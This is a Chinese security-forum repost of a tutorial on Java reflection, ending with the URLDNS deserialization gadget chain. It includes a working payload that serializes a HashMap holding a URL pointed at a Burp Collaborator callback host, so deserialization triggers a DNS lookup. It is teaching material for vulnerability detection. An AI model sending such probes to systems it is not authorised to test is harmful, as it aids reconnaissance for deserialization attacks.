安全矩阵

 找回密码
 立即注册
搜索
查看: 948|回复: 0

java反射

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-16 13:09:52 | 显示全部楼层 |阅读模式
本帖最后由 luozhenni 于 2022-9-16 13:09 编辑



java反射
原文链接:java反射
原创 xinyuan 合天网安实验室 2022-09-15 17:30 发表于湖南

反射是大多数语言里都必不不可少的组成部分,对象可以通过反射获取他的类,类可以通过反射拿到所有方法(包括私有),拿到的方法可以调用,总之通过“反射”,我们可以将Java这种静态语言附加上动态特性。

什么是反射
java的反射是指在运行状态中,对于任意一个类都能够知道这个类所有的属性和方法,并且对于任意一个对象。
基本形式
  1. public void execute(String className, String methodName) throws Exception {
  2. Class clazz = Class.forName(className);
  3. clazz.getMethod(methodName).invoke(clazz.newInstance());
  4. }
复制代码

上面的例子中,我演示了几个在反射里极为重要的方法:获取类的方法:forName 实例例化类对象的方法:newInstance 获取函数的方法:getMethod 执行函数的方法:invoke
反射的作用:
让Java具有动态性,修改已有对象的属性,动态生成对象,动态调用方法,操作内部类和私有方法
在反序列化漏洞中的应用
定制需要的对象,通过invoke调用除了同名函数以外的函数,通过class类创建对象,引入不能序列化的类

java反射举例
此处引用白日梦组长的例子,具体讲解一下反射。
先写一个Person作为我们下面演示的原型类
  1. public class Person {    private String name;    public int age;
  2.     public void act(){        System.out.println("test");    }    @Override    public String toString() {        return "Persion{" +                "name='" + name + '\'' +                ", age=" + age +                '}';    }
  3.     public String getName() {        return name;    }
  4.     public void setName(String name) {        this.name = name;    }
  5.     public int getAge() {        return age;    }
  6.     public void setAge(int age) {        this.age = age;    }
  7.     public Person() {    }
  8.     public Person(String name, int age) {        this.name = name;        this.age = age;    }}
复制代码


获取原型类
使用forName方法
  1. Class c = Class.forName("Person");
复制代码

在此也写一种基于ClassLoader的动态类加载方式
  1. this.getClass().getClassLoader().loadClass("Person");
复制代码

从原型class里面实例化对象
利用构造函数实例化
  1. <code>Constructor constructor = c.getConstructor(String.class,int.class);</code><code>Person p1 = (Person) constructor.newInstance("abc",22);</code>
复制代码

我们来逐行写一下分析
  1. Constructor constructor = c.getConstructor(String.class,int.class);
复制代码

这一行是为了获取原型类中重载的构造方法
  1. <code>public Person(String name, int age) {</code><code>           this.name = name;</code><code>           this.age = age;</code><code>}</code>
复制代码

对构造方法进行传参实例化一个对象
  1. Person p1 = (Person) constructor.newInstance("abc",22);
复制代码

我们可以打印一下p1看一下返回结果
编辑

获取类里面的属性

  1. <code>private String name;</code><code>public int age;</code>
复制代码
public
  1. <code>Field ageField = c.getField("age");</code><code>ageField.set(p1,11);</code>
复制代码

编辑

private
  1. <code>Field nameField = c.getDeclaredField("name");</code><code>nameField.setAccessible(true);</code><code>nameField.set(p1,"xinyuan");</code>
复制代码

编辑

获取类方法
Method actmethod = c.getMethod("act",String.class);
actmethod.invoke(p1,"SKyMirror");
getMethod 与上面的获取构造函数类似,第一个参数是函数名,第二个是传参的类型
invoke方法第一个传入对象,第二个是传入参数值
编辑

利用URLDNS(反射)
这条链子算是反射的一个简单应用。
利用点
URL这个类重写了hashCode方法,导致在执行hashCode的时候,此利用点不能命令执行,但是会请求DNS,所以被用来验证是否存在反序列化漏洞。
源码如下:
编辑

编辑
可以看到当我们调用一次hashCode方法,他会对传进去的URL对象发起请求,即我们如果去DNSLOG申请一个地址,根据访问来判断是否成功执行了hashCode方法进而判断是否执行了反序列化的操作。
URL这个类实现了java.io.Serializable,可以进行序列化的操作。
编辑
因此,在这里我们可以验证一下我们上面的想法。
编辑

编辑

链子
这个链子也比较短,比较简单,主要是利用HashMap来执行hashCode方法
HashMap实现了Serializable可以序列化,此处注意反序列化时HashMap的readObject方法
编辑

我们跟进一下hash方法
编辑

key参数可控,key又是由反序列化的时候生成的。在HashMap中用put传入一个URL的对象,即可在反序列化的时候调用到此方法,从而触发整个链子。
有一点需要注意,我们在序列化的时候,进行的put传参会修改掉传入的URL对象的hashCode的值,因为hashCode值不等于-1,从而导致无法正常触发下面的方法,即无法触发DNS请求。
编辑

同时在正常put传参的时候会执行一次DNS请求,所以我们在put传参之前修改hashCode的值(不为-1就行),传参之后修改hashCode为-1,在反序列化的时候就可以正常执行了。
payload如下
  1. public static void main(String[] args) throws Exception{
  2. HashMaphashMap = new HashMap<>();
  3. URL u = new URL("http://i2loelbsvarbmabqf89qi9k88zep2e.burpcollaborator.net/");
  4. Class c = u.getClass();
  5. //在进行put方法传参之前修改URL对象的hashCode值
  6. Field hashcodeField = c.getDeclaredField("hashCode");
  7. hashcodeField.setAccessible(true);
  8. hashcodeField.set(u,123);
  9. hashMap.put(u,123);
  10. //修改URL对象的hashCode值为-1
  11. hashcodeField.set(u,-1);
  12. serialize(hashMap);
  13. }
复制代码





回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 13:52 , Processed in 0.013600 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表